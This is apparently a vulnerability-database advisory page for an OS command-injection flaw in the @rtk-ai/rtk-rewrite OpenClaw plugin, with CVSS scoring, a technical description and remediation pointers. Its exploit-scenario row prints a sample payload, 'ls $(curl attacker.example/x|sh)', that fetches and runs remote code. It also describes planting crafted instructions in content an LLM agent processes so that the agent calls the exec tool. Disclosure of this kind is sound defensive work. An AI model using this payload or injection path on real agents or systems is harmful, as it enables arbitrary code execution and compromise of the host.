Severity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Injected input reaches the tool remotely with no auth (PR:N) but must be forwarded by an agent/operator workflow (UI:R); shell execution yields full C/I/A within the process (S:U).
Primary rating from Vendor (GitHub_M).
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Lifecycle Timeline
6DescriptionNVD
@rtk-ai/rtk-rewrite transparently rewrites shell commands executed via OpenClaw's exec tool to their RTK equivalents. In 1.0.0, the @rtk-ai/rtk-rewrite OpenClaw plugin passes attacker-controlled input directly into a shell-backed execSync() template string without shell-safe escaping. JSON.stringify() wraps the value in double quotes and escapes inner double-quotes and backslashes, but leaves $() and backtick shell metacharacters untouched. Because execSync delegates execution to /bin/sh -c, the shell expands $(...) substitutions even inside double-quoted strings, causing the injected subcommand to execute before rtk is invoked. An attacker who can influence the exec tool's command parameter (e.g., via an LLM agent prompt or gateway/tool-call input) achieves arbitrary OS command execution with the privileges of the plugin/gateway process.
AnalysisAI
Arbitrary OS command execution in the @rtk-ai/rtk-rewrite 1.0.0 OpenClaw plugin allows an attacker who can influence the exec tool's command parameter - for example through an LLM agent prompt or gateway/tool-call input - to run commands with the privileges of the plugin/gateway process. The flaw stems from unsanitized input being interpolated into a shell-backed execSync() template that /bin/sh -c expands, letting $() and backtick substitutions fire before rtk runs. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that the attacker can influence the OpenClaw exec tool's command parameter passed to the vulnerable @rtk-ai/rtk-rewrite 1.0.0 plugin - concretely, via an LLM agent prompt that the agent turns into an exec call, or via direct gateway/tool-call input - and that the value contains shell command-substitution syntax ($() or backticks), which JSON.stringify() does not escape before execSync runs /bin/sh -c. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score is 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H): network reachable, low complexity, no privileges, but requiring user interaction, with full confidentiality, integrity, and availability impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker plants a crafted instruction in content an LLM agent will process (or submits it directly to a gateway/tool-call), causing the agent to invoke OpenClaw's exec tool with a command parameter such as "ls $(curl attacker.example/x|sh)". When rtk-rewrite builds its execSync() template and /bin/sh -c evaluates it, the $(...) substitution runs first and executes the attacker's payload with the plugin process's privileges. … |
| Remediation | Consult the vendor advisory GHSA-fqgj-m2gp-mr3q (https://github.com/rtk-ai/rtk/security/advisories/GHSA-fqgj-m2gp-mr3q) and upgrade to a fixed release once published; no exact fixed version is stated in the available data, so confirm the patched version directly from that advisory before deploying. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all systems running @rtk-ai/rtk-rewrite 1.0.0 and isolate from untrusted network sources. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38571